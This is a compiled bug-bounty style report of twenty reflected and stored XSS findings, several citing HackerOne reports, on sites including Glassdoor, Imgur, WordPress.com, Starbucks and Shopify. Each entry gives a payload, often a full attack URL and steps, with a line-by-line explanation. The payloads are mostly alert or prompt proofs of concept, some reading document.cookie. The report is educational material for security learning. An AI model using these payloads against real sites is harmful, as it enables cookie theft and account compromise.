Report of XSS

1. Reflected XSS

• When you type the XSS code

<h1onauxclick=confirm(document.domain)>RIGHT CLICK HERE into the
message box, it shows up on the page without being checked for safety.
• If you right-click on "RIGHT CLICK HERE," it runs the code and shows a popup with
the website's name.
• An attacker could change this code to do harmful things, like stealing your
information or redirecting you to a bad site.

2. Reflected XSS

• There’s a reflected XSS vulnerability on the Glassdoor website through the

utm_source parameter.
• This parameter doesn’t check or clean up URL-encoded values properly.
• Using the payload abc;return+false});});alertxss;</script>`, a popup with "xss" is
shown.
• The code tricks the page into running the injected script.
• This allows attackers to add their own code, which can lead to harmful actions like
stealing information.
Example:
• https://www.glassdoor.com/employers/sem-dual-
lp/?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%
60;%3c%2f%73%63%72%69%70%74%3e.
• `abc``: This part can be ignored or treated as arbitrary text, but it allows the
payload to escape the current JavaScript context.
• return false});});: This part is intended to close out existing function calls or
control structures.
• alertxss;: This is where the actual attack occurs; it triggers an alert with the
message "xss".
• </script>: This closes the script tag, allowing the injected code to run.

3. Stored XSS Imgur.com

 • Parameter the vulnerability is found in the create album feature on Imgur,
specifically when handling user input.
• Payload Used ”/>&lt;script>alert(1)&lt;/script>”/>
• Remediation the original report indicated that filtering for < and > was implemented,
but my bypass using HTML entities shows that the filtering is insufficient.
• Impact this reflected XSS vulnerability can allow attackers to steal cookies,
passwords, or execute arbitrary code on a victim's browser, leading to serious
security risks.

4. Stored XSS in wordpress.com

• Login: A user logs into their WordPress account.

• Choose a Post: They select an existing post to comment on.
• Add the Payload: They insert the following code as a comment
<iframe><a href=javascript:alert(document.cookie)>Click Here</a></iframe>
• Saving the Comment: This comment is saved to the site.
• User Interaction: When other users view this post and click on "Click Here," an
alert pops up showing their cookies from the wordpress.com domain.
Payload explained
• Iframe Tag: <iframe> is included but doesn’t serve a purpose here. It’s just a
container that can hold another webpage.
• Anchor Tag: <a href=javascript:alert(document.cookie)>Click
Here</a> is the main part:
• href: The href attribute starts with javascript:, which means the link will run
JavaScript code instead of navigating to a new page.

5. Stored XSS in report field

Stored XSS can be submitted in reports, and whenever someone views the report,
the XSS will be triggered
Payload: "><img src=x onerror=alert(document.domain)>

Explanation of Payload:
o "><img src=x starts a new HTML tag and attempts to load an image.
o onerror=alert(document.domain) means that if the image fails to load
(which it will), it will trigger an alert showing the current domain.
Steps:
• Go to https://app.mopub.com/reports/custom/.
 • Click on New network report.
• In the name field, enter the payload: "><img src=x
onerror=alert(document.domain)>.
• Click Run and save; the XSS will trigger when the report is accessed

6. Stored XSS
• The attacker changes a member's name to include harmful code. When an admin
looks at the activity log, this code runs and shows a popup, which can let the
attacker steal the admin's cookies.

• hunter"><svg/onload=alert(2)>
• hunter": This part ends a name field, allowing the next part to be added.
• <svg/onload=alert(2)>: This creates a small image that shows a popup saying
"2" when the page loads.
• https://hackerone.com/reports/391390

7. Stored XSS

• The harmful code is submitted by the attacker and stored on the victim's blog.
When the victim later edits the post, the stored code executes in their browser. This
type of XSS persists because it remains on the server and affects users who interact
with that content later.
• Submit a Post: The attacker goes to the victim's blog and creates a post with a link
that contains harmful code (like javascript://x.com%0aalert(1);).
• Victim Edits Post: When the victim checks their inbox and edits that post, they
click a link that runs the harmful code.
• Triggering the XSS: This code will then execute, showing an alert with the victim's
domain, proving that the attack worked
• javascript://: This tells the browser to run JavaScript instead of going to a web
page.
• x.com: This part is just a fake website name; it doesn’t really do anything here.
• %0a: This is a way to create a line break in the code.
• alert(1);: This is the actual command that pops up a message box showing the
number "1."
• https://hackerone.com/reports/949382
8. Reflected XSS

• When a user clicks this link, if the website doesn't check the input properly, it will
run the harmful JavaScript code in the user's browser. This shows that the attack
worked and could allow the attacker to do more bad things, like steal cookies or
personal information.
• URL- https://panther.com/search/test<svg on onload=(alert)(document.domain)>
• Payload -test<svg on onload=(alert)(document.domain)>
• <svg> Element: The payload injects an SVG image tag.
• onload Attribute: When the SVG is loaded, it triggers the JavaScript code.
• alert(document.domain): This code shows an alert box displaying the current
domain, which proves the XSS worked

9. Reflected XSS in starbucks.com

• URL-
https://www.starbucks.com/account/signin?ReturnUrl=%19Jav%09asc%09ript%3
ahttps%20%3a%2f%2fwww%2estarbucks%2ecom%2f%250Aalert%2528documen
t.domain%2529
• Payload- 19JavaScript:https://www.starbucks.com/alert(document.domain)
• 19JavaScript:: This is extra text that confuses the website into thinking it’s safe.
• https://www.starbucks.com/: This is just a regular website link.
• alert(document.domain): This part makes a popup appear that shows the name
of the website you're on.
• https://hackerone.com/reports/438240

10. Reflected XSS

• URL-
https://exchangemarketplace.com/blogsearch?q=OnMoUsEoVeR=prompt(/hacked
/)//
• https://exchangemarketplace.com/blogsearch: This is the search page.
• q=: This part is for the search term.
• OnMoUsEoVeR=prompt(/hacked/): This is the harmful code that will run
• https://hackerone.com/reports/1145162
11. Stored XSS

• Payload-<a href="accesskey=x onclick=alert(document.domain)//"></a>

• <a> Tag:This is a link, like a clickable text or button.
• href="accesskey=x":This part is trying to set up a shortcut key (the letter x) to
activate the link.
• onclick=alert(document.domain):This is what happens when the link is clicked
or activated. It runs a piece of JavaScript that shows a popup with the website’s
name.
• //:This is used to ignore anything that comes after it in the code.
• https://hackerone.com/reports/592316

12. Stored XSS in Shopify Chat

• Payload-javascript:alert(1)//https://dqdqdqdqdq.myshopify.com
• javascript::
• This part tells the browser to run some JavaScript code.
• alert(1):
• This is the code that creates a popup that shows the number 1.
• //:
• This means that anything after it is ignored, so the URL doesn’t affect the code.
• https://dqdqdqdqdq.myshopify.com:
• This is a website link, but it’s just ignored because of the //.
• https://hackerone.com/reports/756729

13. Reflected XSS

• https://blocked.myndr.net/?trg="><script>alert(1)</script>
• Payload-?trg="><script>alert(1)</script>
• ?trg=: This part is asking for some information using the trg parameter in the URL.
• ": This is a double quote. It’s used here to close an HTML part that might have been
opened earlier.
• >: This is a greater-than sign. It tells the browser that the previous part is finished

14. Reflected XSS

• In the store settings, change the currency format by adding this code: €{{amount}}
"><img src=x onerror=prompt(document.domain)>.
• This code tricks the website into running a script when the buy button is displayed.
 • When triggered, it shows a pop-up message with the website's domain,
demonstrating an XSS vulnerability.
• €{{amount}}: This shows a price in euros. The {{amount}} is where the actual
price goes.
• ": This closes the price part, letting new code start.
• >: This shows the end of a tag, allowing new code to run.
• <img src=x: This tries to show an image, but src=x doesn’t point to a real image,
so it won’t load.
• onerror=prompt(document.domain): If the image doesn’t load, this code runs
and shows a pop-up with the website’s name

15. Reflected XSS on gratipay.com.

• https://gratipay.com/on/npm/cx%00A<svg onload=alert(1)>
• %00: This is a special character called a null character. It can confuse the website
into thinking the input ends here.
• A: This is just the letter "A." It might be included to make the input look normal.
• <svg onload=alert(1)>:
• <svg>: This is a tag used for drawing pictures on a webpage.
• onload=alert(1): This part means that when the picture is loaded, it will show a
pop-up message with the number 1.

16. Stored XSS in backup scanning plan name

• You can create an XSS vulnerability in the Acronis console by naming a backup plan
with the code: /><svg/onload=prompt(document.domain)>.
• After creating the plan, a pop-up alert will appear multiple times when you try to edit
it.
• This demonstrates that the system is vulnerable to XSS attacks

17. XSS in Email Input [intensedebate.com]

• "><img src=x onerror=alert(document.cookie);>
• https://hackerone.com/reports/1037714

18. Stored XSS

• Go to Email Templates: Navigate to Requests > Email Templates in your Shopify
store.
 • Create New Template: Click on "New Templates" to start creating a new email.
• Edit the Block: Edit the relevant block where you want to add the link.
• Insert XSS Payload: Add a link with an XSS payload (as shown in your screenshot).
• Save the Email: Save the email template after inserting the payload.
• Trigger the XSS: Click on the text "Click Here" to activate the XSS
• https://"><img src=x onerror=prompt(document.domain)>{{7**7'}}:
• https://: This looks like a web address but is part of the code injection.
• ">: These symbols close a part of the code, allowing new code to be added.
• <img src=x: This tries to add an image, but src=x isn’t a real image link, so it won’t
load.
• onerror=prompt(document.domain): If the image doesn’t load, this runs a script
that shows a pop-up with the website’s name.
• >{{7**7'}}: This part may be trying to do a calculation (7 to the power of 7) but
also helps to trick the system.

19. Reflected xss stripo.email

• https://stripo.email//templates/merry-christmas-email-template-winter-
inspiration-gifts-flowers-
industry%3E%22%27%3E%3Cscript%3Ealert%281578%29%3C%2Fscript%3E
• >"'><script>alert(1578)</script>
• >: Greater-than symbol, used to close an HTML tag.
• ": Double quote, commonly used in HTML attributes.
• ': Single quote, also used in HTML attributes.
• >: Another greater-than symbol, indicating the end of a tag.
• https://hackerone.com/reports/714521

20. Self XSS

• Self-XSS:
• Occurs when a user runs harmful code in their own browser.
• The user is tricked into executing the code they input themselves.
• Payload Explanation:
• The payload ("><img src=xx onerror=alert(document.domain)>) creates an
image tag.
• If the image fails to load, it triggers an alert showing the website's domain.
• User Action:
• The vulnerability relies on the user uploading a file with malicious code.
• This affects only the user who performs the action, not other users.
• https://hackerone.com/reports/982510